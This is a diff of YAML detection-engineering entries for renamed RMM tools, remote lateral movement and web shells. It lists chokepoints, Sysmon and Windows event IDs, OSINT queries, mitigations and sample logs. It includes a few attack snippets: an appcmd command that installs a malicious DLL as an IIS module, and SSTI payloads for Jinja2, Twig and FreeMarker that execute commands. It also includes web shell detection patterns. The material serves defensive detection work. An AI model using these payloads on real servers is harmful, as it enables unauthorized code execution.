- C2 relay configuration (vendor cloud vs. self-hosted)
|
||||
AttackerCannotControl:
|
||||
- RMM binary must be downloaded to disk via browser
|
||||
- Binary must execute as a process — PE metadata reveals true identity
|
||||
- Outbound connection to RMM relay is required for remote access
|
||||
- File creation event is logged (Sysmon EID 11)
|
||||
- Process creation event is logged with OriginalFilename mismatch
|
||||
- RMM binary carries a valid vendor code-signing certificate; hash-based detection does not fire
|
||||
Chokepoints:
|
||||
- Stage: Browser Download
|
||||
Input: User clicks a link or is directed to download a file from an attacker-controlled or compromised site
|
||||
@@ -402,7 +390,7 @@ Chokepoints:
|
||||
or generic filename masking RMM software
|
||||
Observable: 'Sysmon EID 11 showing browser process (chrome.exe, msedge.exe) writing an executable to Downloads/Temp.
|
||||
File hash matches a known RMM tool despite the campaign-themed filename.'
|
||||
WhyCantBypass: The binary must land on disk before execution — no in-memory-only path exists for the initial delivery of
|
||||
WhyCantBypass: The binary must land on disk before execution. No in-memory-only path exists for the initial delivery of
|
||||
a standalone RMM installer; the file must be hosted on an attacker-controlled or compromised site reachable by the victim's
|
||||
browser, so delivery cannot be skipped in any variant including TOAD phone-assisted delivery
|
||||
LogSources:
|
||||
@@ -412,37 +400,37 @@ Chokepoints:
|
||||
SigmaRef: sigma-rules/renamed-rmm/hunt.yml
|
||||
- Stage: User Execution
|
||||
Input: RMM binary exists on disk with a masqueraded filename
|
||||
Invariant: User executes the downloaded binary, which is a legitimately-signed RMM tool regardless of its filename — PE
|
||||
Invariant: User executes the downloaded binary, which is a legitimately-signed RMM tool regardless of its filename. PE
|
||||
metadata (OriginalFilename, Company) betrays the mismatch
|
||||
Observable: 'Sysmon EID 1 showing process creation where Image filename differs from PE OriginalFilename metadata.
|
||||
For example: Image=tax_form.exe but OriginalFilename=AnyDesk.exe or Company=philandro Software GmbH.'
|
||||
WhyCantBypass: The binary must execute to establish C2 — no execution means no remote access regardless of delivery success
|
||||
WhyCantBypass: The binary must execute to establish C2. No execution means no remote access regardless of delivery success
|
||||
LogSources:
|
||||
- Sysmon Event ID 1 (Process Creation)
|
||||
- Windows Security Event ID 4688 (Process Creation)
|
||||
DetectionTier: Analyst
|
||||
SigmaRef: sigma-rules/renamed-rmm/analyst.yml
|
||||
BypassNote: CVE exploitation of internet-exposed RMM servers (ScreenConnect CVE-2024-1709, SimpleHelp CVE-2024-57727) bypasses
|
||||
all user-execution detection — monitor RMM server process telemetry separately
|
||||
all user-execution detection. Monitor RMM server process telemetry separately
|
||||
- Stage: Outbound RMM Connection
|
||||
Input: RMM process is running on the endpoint
|
||||
Invariant: Executed binary establishes a persistent connection to RMM relay or attacker-controlled server on standard HTTPS
|
||||
ports
|
||||
Observable: 'Sysmon EID 3 showing outbound HTTPS connection from a process whose Image path is in a user-writable
|
||||
directory to known RMM relay domains or self-hosted infrastructure.'
|
||||
WhyCantBypass: The C2 channel must be established — the entire purpose of RMM tool deployment is persistent remote access
|
||||
WhyCantBypass: The C2 channel must be established. The entire purpose of RMM tool deployment is persistent remote access
|
||||
LogSources:
|
||||
- Sysmon Event ID 3 (Network Connection)
|
||||
- Firewall / proxy egress logs
|
||||
DetectionTier: Analyst
|
||||
SigmaRef: sigma-rules/renamed-rmm/analyst.yml
|
||||
BypassNote: Self-hosted RMM infrastructure (RustDesk, MeshCentral) makes domain-based blocking ineffective — detect by behavior
|
||||
BypassNote: Self-hosted RMM infrastructure (RustDesk, MeshCentral) makes domain-based blocking ineffective. Detect by behavior
|
||||
(browser download + execution + outbound), not by destination
|
||||
EvolutionTimeline:
|
||||
- Date: '2019'
|
||||
Event: TeamViewer and AnyDesk adoption in social engineering campaigns
|
||||
Change: Legitimate RMM binaries adopted as initial access alternative to malware; signed binaries evade hash-based detection.
|
||||
DetectionImpact: New pattern — signed binaries evading hash-based detection
|
||||
DetectionImpact: New pattern. Signed binaries evading hash-based detection
|
||||
Variants: []
|
||||
EventType: event
|
||||
- Date: 2022-Q3
|
||||
@@ -558,7 +546,7 @@ OsintSources:
|
||||
- Platform: URLScan
|
||||
Query: 'filename:MicrosoftTeams.msi OR filename:chrome_update.exe OR filename:security_scan.exe OR filename:verify.exe OR filename:support.exe'
|
||||
URL: https://urlscan.io/search/#filename%3AMicrosoftTeams.msi%20OR%20filename%3Achrome_update.exe%20OR%20filename%3Asecurity_scan.exe%20OR%20filename%3Averify.exe%20OR%20filename%3Asupport.exe
|
||||
Notes: 'Targets documented masquerade filenames used in renamed RMM campaigns — fake Teams installers
|
||||
Notes: 'Targets documented masquerade filenames used in renamed RMM campaigns, including fake Teams installers
|
||||
(March 2026 signed malware campaign), fake Chrome updates (SocGholish/FakeUpdates), and security/support
|
||||
themed binaries (UltraViewer campaigns). Rotate with seasonal themes: tax-document, invoice, SSN,
|
||||
E-Invite, Party Card Viewer during relevant periods.'
|
||||
@@ -570,13 +558,13 @@ OsintSources:
|
||||
- Platform: Censys
|
||||
Query: 'services.tls.certificate.parsed.subject.common_name: "SimpleHelp"'
|
||||
URL: https://search.censys.io/search?resource=hosts&q=services.tls.certificate.parsed.subject.common_name%3A+%22SimpleHelp%22
|
||||
Notes: Finds infrastructure presenting SimpleHelp TLS certificates — currently the most actively exploited RMM platform
|
||||
Notes: Finds infrastructure presenting SimpleHelp TLS certificates; currently the most actively exploited RMM platform
|
||||
per CISA AA25-163A.
|
||||
- Platform: VirusTotal Intelligence
|
||||
Query: have:itw tag:peexe (metadata:"AnyDesk" OR metadata:"ScreenConnect" OR metadata:"SimpleHelp" OR metadata:"NetSupport")
|
||||
URL: https://www.virustotal.com/gui/search/have%3Aitw%20tag%3Apeexe%20metadata%3A%22AnyDesk%22
|
||||
Notes: Requires VT Intelligence subscription; finds PE executables in the wild whose internal metadata references known
|
||||
RMM vendors — the core renamed-binary delivery mechanism.
|
||||
RMM vendors; the core renamed-binary delivery mechanism.
|
||||
- Platform: LOLRMM
|
||||
URL: https://lolrmm.io
|
||||
Notes: Community-maintained catalog of every known RMM tool with file metadata, network indicators, and detection heuristics
|
||||
@@ -615,13 +603,13 @@ RawLogs:
|
||||
|
||||
CreationUtcTime: 2024-10-15 09:34:12.881
|
||||
|
||||
# Browser drops .exe directly to Downloads — combined with execution signals Hunt/Analyst rules
|
||||
# Browser drops .exe directly to Downloads. Combined with execution signals Hunt/Analyst rules
|
||||
|
||||
'
|
||||
- Type: Sysmon
|
||||
EventId: 1
|
||||
Source: Microsoft-Windows-Sysmon/Operational
|
||||
Description: Renamed RMM binary executed — OriginalFilename mismatch is the Analyst signal
|
||||
Description: Renamed RMM binary executed. OriginalFilename mismatch is the Analyst signal
|
||||
MatchedRules:
|
||||
- Research
|
||||
- Hunt
|
||||
|
||||
@@ -54,9 +54,9 @@ Variations:
|
||||
FirstSeen: '2016'
|
||||
Status: Legacy
|
||||
SourceURL: https://github.com/byt3bl33d3r/CrackMapExec
|
||||
NotesShort: Archived December 2023; superseded by NetExec — CME-specific signatures now stale
|
||||
NotesShort: Archived December 2023; superseded by NetExec. CME-specific signatures now stale
|
||||
Notes: Multi-protocol framework covering SMB, WMI, WinRM, MSSQL; original repository archived by maintainer on December
|
||||
6, 2023 (read-only); superseded by NetExec — defenders should not expect CME-specific signatures to receive community
|
||||
6, 2023 (read-only); superseded by NetExec. Defenders should not expect CME-specific signatures to receive community
|
||||
updates
|
||||
VariantId: crackmapexec
|
||||
Command:
|
||||
@@ -156,25 +156,13 @@ Variations:
|
||||
Prerequisites:
|
||||
- Network access to target on at least one required protocol port (SMB 445, WMI/RPC 135, WinRM 5985/5986)
|
||||
- Remote execution surface enabled on target (Server service for SMB, WinRM service, WMI, or Task Scheduler)
|
||||
AttackerControls:
|
||||
- Tool used (Impacket, NetExec, CrackMapExec, Evil-WinRM)
|
||||
- Protocol choice (SMB, WMI, WinRM, DCOM)
|
||||
- Execution method (psexec, smbexec, wmiexec, atexec)
|
||||
- Lateral movement scope and targeting
|
||||
- Credential source (dumped, sprayed, pass-the-hash)
|
||||
AttackerCannotControl:
|
||||
- Must have valid admin credentials for the target
|
||||
- Must authenticate over the network to the target
|
||||
- Must create a remote process or service on the target
|
||||
- Authentication event is logged on the target (4624 Type 3)
|
||||
- Process/service creation is logged on the target
|
||||
Chokepoints:
|
||||
- Stage: Network Authentication
|
||||
Input: Attacker has valid admin credentials (password, hash, or ticket)
|
||||
Invariant: Valid admin credentials (local or domain) must be obtained before any remote execution attempt
|
||||
Observable: 'Windows Security EID 4624 (Logon Type 3 — Network) with admin account. EID 4672 (Special Privilege
|
||||
Observable: 'Windows Security EID 4624 (Logon Type 3, Network) with admin account. EID 4672 (Special Privilege
|
||||
Logon). Source IP is typically not a known admin workstation.'
|
||||
WhyCantBypass: All remote execution tools require authenticated access — no valid credentials means authentication failure
|
||||
WhyCantBypass: All remote execution tools require authenticated access. No valid credentials means authentication failure
|
||||
at every attempted protocol regardless of which tool is used
|
||||
LogSources:
|
||||
- Windows Security Event ID 4624 (Network Logon)
|
||||
@@ -185,13 +173,13 @@ Chokepoints:
|
||||
SigmaRef: ''
|
||||
- Stage: Remote Process/Service Creation
|
||||
Input: Authenticated admin session established on target
|
||||
Invariant: Tool invokes a Windows execution primitive on the remote host — service creation (SMB), WMI process spawn, scheduled
|
||||
Invariant: Tool invokes a Windows execution primitive on the remote host: service creation (SMB), WMI process spawn, scheduled
|
||||
task creation, or WinRM command
|
||||
Observable: 'Sysmon EID 1 showing services.exe or wmiprvse.exe spawning cmd.exe/powershell.exe. Windows Security
|
||||
EID 7045 (Service Installed) for psexec-style tools. EID 4688 with cross-logon session correlation.'
|
||||
WhyCantBypass: A command must run on the target via one of these four primitives — no other execution surface exists over
|
||||
these authenticated protocols; tools must first establish an authenticated session over a protocol port (445, 135, 5985/5986)
|
||||
— no reachable port means no remote execution regardless of credential validity
|
||||
WhyCantBypass: A command must run on the target via one of these four primitives. No other execution surface exists over
|
||||
these authenticated protocols. Tools must first establish an authenticated session over a protocol port (445, 135, 5985/5986).
|
||||
No reachable port means no remote execution regardless of credential validity
|
||||
LogSources:
|
||||
- Windows Security Event ID 4697 / System 7045 (Service Installed)
|
||||
- Windows Security Event ID 5145 (IPC$/svcctl share access)
|
||||
@@ -199,7 +187,7 @@ Chokepoints:
|
||||
DetectionTier: Analyst
|
||||
SigmaRef: sigma-rules/remote-execution/analyst.yml
|
||||
BypassNote: LOTL tools (winrs.exe, wmic /node:, Enter-PSSession, Invoke-Command) produce identical telemetry to Impacket
|
||||
but with signed Microsoft binaries — detection must be purely behavioral with no reliance on tool signatures
|
||||
but with signed Microsoft binaries. Detection must be purely behavioral with no reliance on tool signatures
|
||||
- Stage: Lateral Spread
|
||||
Input: Remote command interpreter is running on one or more targets
|
||||
Invariant: The same credential and execution primitive sequence repeats across multiple hosts in a short window or follows
|
||||
@@ -207,7 +195,7 @@ Chokepoints:
|
||||
Observable: 'Windows Security EID 4624 showing the same account authenticating to multiple hosts within minutes.
|
||||
Sysmon EID 3 showing same source IP connecting to multiple RFC1918 destinations on SMB/WinRM ports.'
|
||||
WhyCantBypass: Lateral movement by definition requires replication of the credential-plus-primitive pattern on each subsequent
|
||||
host — the telemetry is identical on every hop
|
||||
host. The telemetry is identical on every hop
|
||||
LogSources:
|
||||
- Windows Security Event ID 4624 (multiple target hosts, short window)
|
||||
- Sysmon Event ID 3 (same source IP, multiple RFC1918 destinations)
|
||||
@@ -332,7 +320,7 @@ OsintSources:
|
||||
- Platform: Shodan
|
||||
Query: port:5985 product:"Microsoft HTTPAPI"
|
||||
URL: https://www.shodan.io/search?query=port%3A5985+product%3A%22Microsoft+HTTPAPI%22
|
||||
Notes: Finds internet-exposed WinRM endpoints; narrow with 'org:' or 'net:' filters to audit your own attack surface — run
|
||||
Notes: Finds internet-exposed WinRM endpoints; narrow with 'org:' or 'net:' filters to audit your own attack surface. Run
|
||||
a second query on port 5986 for the HTTPS variant.
|
||||
- Platform: Shodan
|
||||
Query: ssl.jarm:07d14d16d21d21d00042d41d00041de5fb3038104f457d92ba37e62256d5 port:443
|
||||
@@ -351,7 +339,7 @@ KnownBypasses:
|
||||
Mitigation: Enable SMB signing and LDAP signing; disable NTLM where operationally feasible.
|
||||
- Bypass: Using legitimate admin tools (psexec.exe from Sysinternals)
|
||||
Mitigation: Enforce software allowlisting and monitor hash for known-good vs. impersonated versions.
|
||||
- Bypass: Living Off the Land — built-in Windows admin tools (winrs.exe, wmic /node:, Enter-PSSession)
|
||||
- Bypass: Living Off the Land using built-in Windows admin tools (winrs.exe, wmic /node:, Enter-PSSession)
|
||||
Mitigation: Restrict WinRM and WMI access via Windows Firewall; require PAW for remote administration.
|
||||
- Bypass: Kerberos-based lateral movement (Overpass-the-Hash, Pass-the-Ticket, Silver/Golden Tickets)
|
||||
Mitigation: Enable AES encryption for Kerberos; protect the krbtgt account; monitor for anomalous TGS requests.
|
||||
@@ -386,13 +374,13 @@ RawLogs:
|
||||
|
||||
IpPort: 49221
|
||||
|
||||
# LogonType=3 (Network) from internal IP — pre-execution authentication
|
||||
# LogonType=3 (Network) from internal IP. Pre-execution authentication.
|
||||
|
||||
'
|
||||
- Type: Windows Event Log
|
||||
EventId: 5145
|
||||
Source: Microsoft-Windows-Security-Auditing
|
||||
Description: IPC$ share access — PsExec/Impacket opens IPC$/svcctl before service creation
|
||||
Description: IPC$ share access. PsExec/Impacket opens IPC$/svcctl before service creation
|
||||
MatchedRules:
|
||||
- Analyst
|
||||
Sample: 'EventID: 5145 (A network share object was checked for access)
|
||||
@@ -418,7 +406,7 @@ RawLogs:
|
||||
- Type: Windows Event Log
|
||||
EventId: 7045
|
||||
Source: Service Control Manager
|
||||
Description: Random-named service installed from TEMP path — classic PsExec/Impacket signature
|
||||
Description: Random-named service installed from TEMP path. Classic PsExec/Impacket signature
|
||||
MatchedRules:
|
||||
- Research
|
||||
- Hunt
|
||||
@@ -446,7 +434,7 @@ RawLogs:
|
||||
- Type: Sysmon
|
||||
EventId: 1
|
||||
Source: Microsoft-Windows-Sysmon/Operational
|
||||
Description: cmd.exe spawned from services.exe — service binary executing attacker commands
|
||||
Description: cmd.exe spawned from services.exe. Service binary executing attacker commands
|
||||
MatchedRules:
|
||||
- Hunt
|
||||
- Analyst
|
||||
@@ -466,7 +454,7 @@ RawLogs:
|
||||
|
||||
# services.exe → cmd.exe is the canonical PsExec parent chain
|
||||
|
||||
# Output redirected to ADMIN$ share — PsExec output capture pattern
|
||||
# Output redirected to ADMIN$ share. PsExec output capture pattern.
|
||||
|
||||
'
|
||||
EmulationScript:
|
||||
|
||||
@@ -16,7 +16,7 @@ DetectionPriority: CRITICAL
|
||||
ThreatPrevalence: HIGH
|
||||
DetectionDifficulty: MEDIUM
|
||||
Description: 'Adversaries plant web-accessible scripts (web shells) on compromised servers to maintain persistent command
|
||||
execution via HTTP/HTTPS. Web shells are deployed in virtually every major web-facing compromise — appearing in 35% of Q4
|
||||
execution via HTTP/HTTPS. Web shells are deployed in virtually every major web-facing compromise, appearing in 35% of Q4
|
||||
2024 IR incidents (Cisco Talos) and serving as the primary persistence mechanism in ProxyLogon, ProxyShell, MOVEit, Barracuda
|
||||
ESG, and Ivanti zero-day campaigns. Despite diversity in language (PHP/ASP.NET/JSP/Python), encoding (base64, XOR, gzinflate,
|
||||
multi-layer), and evasion technique (polyglot files, fileless IIS modules, steganography), the chokepoint is invariant:
|
||||
@@ -141,7 +141,7 @@ Variations:
|
||||
Notes: 'Webshells deployed against Ivanti Connect Secure appliances via CVE-2023-46805 (auth bypass) and CVE-2024-21887
|
||||
(command injection). GLASSTOKEN was the initial variant; BUSHWALK, LIGHTWIRE, and CHAINLINE were deployed post-mitigation
|
||||
bypass. Over 1,700 appliances compromised. Demonstrates the shift from web application webshells to network appliance
|
||||
webshells — same parent-child execution pattern, different host OS environment.
|
||||
webshells. Same parent-child execution pattern, different host OS environment.
|
||||
|
||||
'
|
||||
VariantId: glasstoken-bushwalk-ivanti
|
||||
@@ -158,7 +158,7 @@ Variations:
|
||||
SourceURL: https://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/
|
||||
Notes: 'Webshell-style implants deployed by UNC4841 (China-nexus) against Barracuda Email Security Gateway appliances via
|
||||
CVE-2023-2868 (remote command injection via TAR file). Exploited as zero-day from October 2022; disclosed May 2023. CISA
|
||||
mandated full appliance replacement — patches were insufficient. Demonstrates webshells surviving factory reset via firmware-level
|
||||
mandated full appliance replacement; patches were insufficient. Demonstrates webshells surviving factory reset via firmware-level
|
||||
persistence on physical appliances.
|
||||
|
||||
'
|
||||
@@ -184,7 +184,7 @@ Variations:
|
||||
VariantId: fileless-iis-native-modules
|
||||
Command:
|
||||
Invocation: "# Installed as native IIS module (C++ DLL):\nappcmd.exe install module /name:\"MyModule\" /image:\"C:\\path\\to\\malicious.dll\"\n# Or via web.config: <modules><add name=\"MyModule\" .../></modules>\n# No script file on disk — runs in-process with w3wp.exe"
|
||||
Context: 'Documented by Microsoft (Dec 2022). Native C++ IIS modules run in-process with w3wp.exe — no child process for basic operations. Can intercept credentials from HTTP traffic.'
|
||||
Context: 'Documented by Microsoft (Dec 2022). Native C++ IIS modules run in-process with w3wp.exe; no child process for basic operations. Can intercept credentials from HTTP traffic.'
|
||||
Artifacts:
|
||||
- 'Sysmon EID 7: Unusual DLL loaded by w3wp.exe'
|
||||
- 'IIS logs: appcmd.exe install module commands'
|
||||
@@ -221,7 +221,7 @@ Variations:
|
||||
VariantId: server-side-template-injection-ssti-webshells
|
||||
Command:
|
||||
Invocation: "# Jinja2: {{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}\n# Twig: {{_self.env.registerUndefinedFilterCallback(\"exec\")}}{{_self.env.getFilter(\"whoami\")}}\n# FreeMarker: <#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"whoami\")}"
|
||||
Context: 'Exploits template engines to execute code without uploading a file. No persistent file on disk — the shell is the injection payload itself.'
|
||||
Context: 'Exploits template engines to execute code without uploading a file. No persistent file on disk. The shell is the injection payload itself.'
|
||||
Artifacts:
|
||||
- 'Web logs: Template syntax in request parameters ({{ }}, <# >, etc.)'
|
||||
- 'Sysmon EID 1: Web server spawning cmd.exe/sh after template rendering'
|
||||
@@ -233,26 +233,14 @@ Prerequisites:
|
||||
- Web server must execute the shell's scripting language (PHP, ASP.NET, JSP, etc.)
|
||||
- HTTP/HTTPS access to the deployed shell from attacker infrastructure
|
||||
- Server must have OS command execution capability (not hardened to deny shell spawning)
|
||||
AttackerControls:
|
||||
- Web shell language (PHP, ASP.NET, JSP, Python)
|
||||
- Obfuscation technique (encoding, encryption, polyglot)
|
||||
- Delivery method (exploit, upload, supply chain)
|
||||
- Shell architecture (one-liner, modular, encrypted C2)
|
||||
- Filename and location on disk
|
||||
AttackerCannotControl:
|
||||
- Web server process must spawn a child OS interpreter or load attacker-controlled code
|
||||
- Malicious code must be reachable by the web server (file on disk, loaded DLL, or injected input)
|
||||
- HTTP request triggers the shell execution
|
||||
- Child process inherits web server's user context
|
||||
- Process creation or DLL load event is logged with web server as parent
|
||||
Chokepoints:
|
||||
- Stage: Shell Deployment
|
||||
Input: Attacker has write access to web-accessible directory, module registry, or injectable input field
|
||||
Invariant: Must deploy executable code reachable by the web server — a script file in the web root,
|
||||
Invariant: Must deploy executable code reachable by the web server. Options are a script file in the web root,
|
||||
a native DLL loaded as an IIS module, or an injection payload processed by a template engine
|
||||
Observable: 'Script-based: Sysmon EID 11 showing w3wp.exe/httpd/nginx writing .php/.aspx/.jsp to web root.
|
||||
Module-based: Sysmon EID 7 showing unusual DLL loaded by w3wp.exe or appcmd.exe install module.
|
||||
Injection-based: No file artifact — detected at the execution stage.'
|
||||
Injection-based: No file artifact. Detected at the execution stage.'
|
||||
WhyCantBypass: The web server must be able to reach and execute the attacker's code. For file-based shells,
|
||||
the file must exist on disk. For IIS modules, the DLL must be loaded. For SSTI, the template engine must
|
||||
process the input. Each path produces a different artifact but all require server-side code execution.
|
||||
@@ -267,7 +255,7 @@ Chokepoints:
|
||||
Observable: 'Sysmon EID 1 showing w3wp.exe / httpd / nginx spawning cmd.exe, powershell.exe, /bin/sh, /bin/bash, or
|
||||
python. This parent-child relationship is the invariant regardless of shell language or obfuscation.'
|
||||
WhyCantBypass: The web shell must execute OS commands to be useful. The OS requires a process to run those commands.
|
||||
That process creation — with a web server parent — is always observable.
|
||||
That process creation, with a web server parent, is always observable.
|
||||
LogSources:
|
||||
- Sysmon Event ID 1 (Process Creation)
|
||||
- Windows Security Event ID 4688 (Process Creation)
|
||||
@@ -389,7 +377,7 @@ Detections:
|
||||
server-side scripting
|
||||
SigmaRule: sigma-rules/web-shells/hunt.yml
|
||||
- Level: Analyst
|
||||
Description: Web server spawns shell interpreter with suspicious command AND web-accessible file recently created — direct
|
||||
Description: Web server spawns shell interpreter with suspicious command AND web-accessible file recently created. Direct
|
||||
webshell execution signal
|
||||
LogSources:
|
||||
- Sysmon Event ID 1 (Process Creation)
|
||||
@@ -442,7 +430,7 @@ OsintSources:
|
||||
- Platform: Shodan
|
||||
Query: http.title:"WSO" OR http.title:"b374k" OR http.title:"c99" OR http.title:"FilesMan" OR http.title:"Antak Webshell"
|
||||
URL: https://www.shodan.io/search?query=http.title%3A%22WSO%22+OR+http.title%3A%22b374k%22+OR+http.title%3A%22c99%22
|
||||
Notes: Finds internet-exposed web shells with default page titles intact — common in mass exploitation campaigns where attacker
|
||||
Notes: Finds internet-exposed web shells with default page titles intact. Common in mass exploitation campaigns where attacker
|
||||
cadence outpaces cleanup. FilesMan and Antak are additional shells frequently left exposed. Also try http.html:"eval(base64_decode"
|
||||
to catch obfuscated PHP shells that render without a recognizable title.
|
||||
- Platform: URLScan
|
||||
@@ -454,13 +442,13 @@ OsintSources:
|
||||
- Platform: VirusTotal Intelligence
|
||||
Query: tag:webshell positives:0 type:text
|
||||
URL: https://www.virustotal.com/gui/search/tag%3Awebshell%20positives%3A0%20type%3Atext
|
||||
Notes: Requires VT Intelligence subscription. Finds webshell samples currently evading all commercial AV detection — the
|
||||
most dangerous variants in active use. Consistent with ShellForge paper (arXiv 2601.22182) finding 93.9% evasion against
|
||||
Notes: Requires VT Intelligence subscription. Finds webshell samples currently evading all commercial AV detection. These
|
||||
are the most dangerous variants in active use. Consistent with ShellForge paper (arXiv 2601.22182) finding 93.9% evasion against
|
||||
commercial engines. Sort by submission date to prioritize the newest evasive variants.
|
||||
- Platform: Censys
|
||||
Query: 'services.http.response.body: "eval(base64_decode" and services.http.response.status_code: 200'
|
||||
URL: https://search.censys.io/search?resource=hosts&q=services.http.response.body%3A+%22eval(base64_decode%22
|
||||
Notes: Finds web servers returning HTTP 200 responses with the eval(base64_decode PHP obfuscation pattern — a near-universal
|
||||
Notes: Finds web servers returning HTTP 200 responses with the eval(base64_decode PHP obfuscation pattern. This is a near-universal
|
||||
indicator of a live obfuscated PHP shell. High precision; few legitimate pages contain this pattern. Requires Censys account.
|
||||
KnownBypasses:
|
||||
- Bypass: Multi-layer encoding (base64 + gzinflate + XOR + eval) bypasses keyword and signature scanning
|
||||
@@ -488,7 +476,7 @@ KnownBypasses:
|
||||
attacker reconnaissance.
|
||||
|
||||
'
|
||||
- Bypass: SSTI-based execution requires no uploaded file — exploits existing template processing
|
||||
- Bypass: SSTI-based execution requires no uploaded file; it exploits existing template processing
|
||||
Mitigation: Sanitize all user input before passing to template engines; disable dangerous template evaluation features;
|
||||
enforce context-aware output encoding
|
||||
Detection: 'WAF rules for SSTI payload patterns (${{, <%=, #{7*7}); web server access logs showing injection payloads in
|
||||
@@ -496,8 +484,8 @@ KnownBypasses:
|
||||
- Bypass: Encrypted C2 channels (Godzilla, Behinder) bypass network-based detection of webshell traffic
|
||||
Mitigation: TLS inspection at network boundary; behavioral analysis of HTTP traffic patterns (high POST frequency to a single
|
||||
endpoint, fixed-interval requests, unusual or rotating User-Agent strings)
|
||||
Detection: 'Network-layer detection is unreliable against encrypted shells. Process creation monitoring remains effective
|
||||
— even Godzilla and Behinder must spawn child processes to execute OS commands. The invariant signal is the endpoint:
|
||||
Detection: 'Network-layer detection is unreliable against encrypted shells. Process creation monitoring remains effective.
|
||||
Even Godzilla and Behinder must spawn child processes to execute OS commands. The invariant signal is the endpoint:
|
||||
w3wp.exe or java spawning cmd.exe or /bin/sh, regardless of how the HTTP command request was encrypted.
|
||||
|
||||
'
|
||||
@@ -562,7 +550,7 @@ RawLogs:
|
||||
- Type: Sysmon
|
||||
EventId: 1
|
||||
Source: Microsoft-Windows-Sysmon/Operational
|
||||
Description: PowerShell with encoded command spawned by w3wp.exe — encoded web shell execution
|
||||
Description: PowerShell with encoded command spawned by w3wp.exe. Encoded web shell execution
|
||||
MatchedRules:
|
||||
- Hunt
|
||||
- Analyst
|
||||
|
||||
Reference in New Issue
Block a user